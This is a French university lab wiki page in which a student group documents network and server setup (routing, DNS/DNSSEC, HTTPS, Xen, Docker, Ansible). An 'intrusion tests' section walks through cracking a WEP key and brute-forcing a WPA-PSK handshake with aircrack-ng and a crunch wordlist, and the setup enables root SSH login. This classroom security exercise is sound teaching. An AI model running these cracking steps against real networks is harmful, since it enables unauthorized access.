 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52004</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52004"/>
				<updated>2020-01-05T14:47:25Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du commutateur 1 (COM-1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
